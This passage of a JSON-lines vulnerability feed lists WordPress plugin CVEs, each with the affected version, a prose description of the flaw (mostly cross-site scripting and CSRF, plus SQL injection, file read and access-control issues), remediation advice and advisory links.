xed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4841","slug":"feeds-for-youtube","versionImpact":"2.1","description":"The Feeds for YouTube for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'youtube-feed' shortcode in versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/376e2638-a873-4142-ad7d-067ae3333709?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/376e2638-a873-4142-ad7d-067ae3333709?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966017\\\/feeds-for-youtube#file564\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966017\\\/feeds-for-youtube#file564\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/tags\\\/2.1\\\/templates\\\/feed.php#L33\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feeds-for-youtube\\\/tags\\\/2.1\\\/templates\\\/feed.php#L33\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3899","slug":"3dprint","versionImpact":"3.5.4.7","description":"The 3dprint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3131e16-a0eb-4d26-b6d3-048fc1f1e9fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3131e16-a0eb-4d26-b6d3-048fc1f1e9fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4697","slug":"cowidgets-elementor-addons","versionImpact":"1.1.1","description":"The Cowidgets \u2013 Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018heading_tag\u2019 parameter in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb28e9e-bf6a-4eed-afbc-ca85ec489df7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/beb28e9e-bf6a-4eed-afbc-ca85ec489df7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-page-title.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-page-title.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-site-title.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cowidgets-elementor-addons\\\/trunk\\\/inc\\\/widgets-manager\\\/widgets\\\/header\\\/class-site-title.php#L423\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5444","slug":"bible-text","versionImpact":"0.2","description":"The Bible Text WordPress plugin through 0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21eddf64-c71e-4aba-b1e9-fe67b4ddfb30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21eddf64-c71e-4aba-b1e9-fe67b4ddfb30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11975","slug":"reactflow-session-replay-heatmap","versionImpact":"1.0.10","description":"The Reactflow Visitor Recording and Heatmaps plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.10. This is due to missing or incorrect nonce validation affecting the _wpnonce parameter. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reactflow-session-replay-heatmap\\\/tags\\\/1.0.10\\\/reactflow.php#L882\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reactflow-session-replay-heatmap\\\/tags\\\/1.0.10\\\/reactflow.php#L882\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reactflow-session-replay-heatmap\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/reactflow-session-replay-heatmap\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb360c56-e144-4dc5-8bfb-715a014cb8e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11907","slug":"skyword-plugin","versionImpact":"2.5.2","description":"The Skyword API Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'skyword_iframe' shortcode in all versions up to, and including, 2.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skyword-plugin\\\/trunk\\\/php\\\/class-skyword-shortcode.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skyword-plugin\\\/trunk\\\/php\\\/class-skyword-shortcode.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skyword-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/skyword-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/615eb349-c5ed-4b6e-bd60-b92b8790427f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/615eb349-c5ed-4b6e-bd60-b92b8790427f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13518","slug":"simplepress","versionImpact":"6.10.11","description":"The Simple:Press Forum plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.10.11. This is due to missing or incorrect nonce validation on the 'sp_save_edited_post' function. This makes it possible for unauthenticated attackers to modify a forum post via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/forum\\\/database\\\/sp-db-management.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simplepress\\\/trunk\\\/forum\\\/database\\\/sp-db-management.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4484fa86-5878-426d-92b9-8eb0751075e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4484fa86-5878-426d-92b9-8eb0751075e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3431","slug":"dzs-zoomsounds","versionImpact":"6.91","description":"The ZoomSounds - WordPress Wave Audio Player with Playlist plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 6.91 via the 'dzsap_download' action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/zoomsounds-wordpress-wave-audio-player-with-playlist\\\/6181433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78998da-1cb1-4991-95a8-a551bde04064?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a78998da-1cb1-4991-95a8-a551bde04064?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31923","slug":"css3_accordions","versionImpact":"3.0","description":"Missing Authorization vulnerability in QuanticaLabs CSS3 Accordions for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CSS3 Accordions for WordPress: from n\/a through 3.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-3-0-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-3-0-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2688","slug":"wp-file-upload","versionImpact":"4.19.1","description":"The WordPress File Upload and WordPress File Upload Pro plugins for WordPress are vulnerable to Path Traversal in versions up to, and including, 4.19.1 via the vulnerable parameter wfu_newpath. This allows administrator-level attackers to move files uploaded with the plugin (located in wp-content\/uploads by default) outside of the web root.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915978%40wp-file-upload%2Ftrunk&old=2909107%40wp-file-upload%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abd6eeac-0a7e-4762-809f-593cd85f303d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abd6eeac-0a7e-4762-809f-593cd85f303d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4412","slug":"wp-prayer","versionImpact":"1.6.5","description":"The WP Prayer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.5. This is due to missing or incorrect nonce validation on the save() and export() functions. This makes it possible for unauthenticated attackers to save plugin settings and trigger a data export via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7efbdb1-989f-4171-ab55-aff66014337a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7efbdb1-989f-4171-ab55-aff66014337a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2543740%40wp-prayer&new=2543740%40wp-prayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2543740%40wp-prayer&new=2543740%40wp-prayer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3025","slug":"dropbox-folder-share","versionImpact":"1.9.7","description":"The Dropbox Folder Share plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.9.7 via the 'link' parameter. This can allow unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/DropboxFolderShare\\\/Principal.php#L118\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/DropboxFolderShare\\\/Principal.php#L118\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd2bd-db01-479f-89e4-8031d69a912f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d62bd2bd-db01-479f-89e4-8031d69a912f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5114","slug":"idbbee","versionImpact":"1.0","description":"The idbbee plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'idbbee' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idbbee\\\/trunk\\\/idbbee.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idbbee\\\/trunk\\\/idbbee.php#L34\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac763936-7147-4100-8a46-4c6d2f2224b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac763936-7147-4100-8a46-4c6d2f2224b4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4478","slug":"happy-elementor-addons","versionImpact":"3.10.7","description":"The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Stack Group widget in all versions up to, and including, 3.10.7 due to insufficient input sanitization and output escaping on user supplied 'tooltip_position' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7243f40-5cca-475a-bb27-44fab965bb0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7243f40-5cca-475a-bb27-44fab965bb0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.7\\\/widgets\\\/image-stack-group\\\/widget.php#L611\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-elementor-addons\\\/tags\\\/3.10.7\\\/widgets\\\/image-stack-group\\\/widget.php#L611\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/#file584\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083138\\\/#file584\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/happy-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4462","slug":"nafeza-prayer-time","versionImpact":"1.2.9","description":"The Nafeza Prayer Time plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbf83d9-ce5e-4139-ba12-b00df4d9ad89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbf83d9-ce5e-4139-ba12-b00df4d9ad89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nafeza-prayer-time\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/nafeza-prayer-time\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3627","slug":"wheel-of-life","versionImpact":"1.1.7","description":"The Wheel of Life: Coaching and Assessment Tool for Life Coach plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on several functions in the AjaxFunctions.php file in all versions up to, and including, 1.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts and modify settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0615d1be-f9fa-45b3-9d5b-3ad1f36be8e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0615d1be-f9fa-45b3-9d5b-3ad1f36be8e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wheel-of-life\\\/trunk\\\/includes\\\/functions\\\/AjaxFunctions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wheel-of-life\\\/trunk\\\/includes\\\/functions\\\/AjaxFunctions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6926","slug":"viral-signup","versionImpact":"2.1","description":"The Viral Signup WordPress plugin through 2.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ce96ce5-fcf0-4d7a-b562-f63ea3418d93\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11938","slug":"woo-one-click-upsell-funnel","versionImpact":"3.4.9","description":"The One Click Upsell Funnel for WooCommerce \u2013  Funnel Builder for WordPress, Create WooCommerce Upsell, Post-Purchase Upsell & Cross Sell Offers that Boost Sales & Increase Profits with Sales Funnel Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wps_wocuf_pro_yes shortcode in all versions up to, and including, 3.4.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-one-click-upsell-funnel\\\/tags\\\/3.4.9\\\/public\\\/class-woocommerce-one-click-upsell-funnel-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-one-click-upsell-funnel\\\/tags\\\/3.4.9\\\/public\\\/class-woocommerce-one-click-upsell-funnel-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-one-click-upsell-funnel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-one-click-upsell-funnel\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c10d6cb-e0a7-4b8d-b50f-e23885355872?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11815","slug":"posturinn","versionImpact":"1.3.1","description":"The P\u00f3sturinn's Shipping with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the printed_marked and nonprinted_marked parameters in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posturinn\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posturinn\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a8dc0e3-ff3a-4abc-afca-eb1879603550?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a8dc0e3-ff3a-4abc-afca-eb1879603550?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2882","slug":"green-money-payment-gateway","description":"The GreenPay(tm) by Green.Money plugin for WordPress is vulnerable to Sensitive Information Exposure in versions between 3.0.0 and 3.0.9 through the publicly accessible phpinfo.php script. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-money-payment-gateway\\\/trunk\\\/phpinfo.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/green-money-payment-gateway\\\/trunk\\\/phpinfo.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267032\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3267032\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/green-money-payment-gateway\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/green-money-payment-gateway\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed57bb85-d4b5-4c89-a1c7-c3b8a0a5a2ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed57bb85-d4b5-4c89-a1c7-c3b8a0a5a2ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31922","slug":"css3_accordions","versionImpact":"3.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in QuanticaLabs CSS3 Accordions for WordPress allows Stored XSS. This issue affects CSS3 Accordions for WordPress: from n\/a through 3.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-plugin-3-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/css3_accordions\\\/vulnerability\\\/wordpress-css3-accordions-for-wordpress-plugin-3-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4411","slug":"wp-easy-pay","versionImpact":"3.2.0","description":"The WP EasyPay \u2013 Square for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.0. This is due to missing or incorrect nonce validation on the wpep_download_transaction_in_excel() function. This makes it possible for unauthenticated attackers to trigger a transactions download via a forged request granted they can trick a site administrator into performing an action such as clicking on a 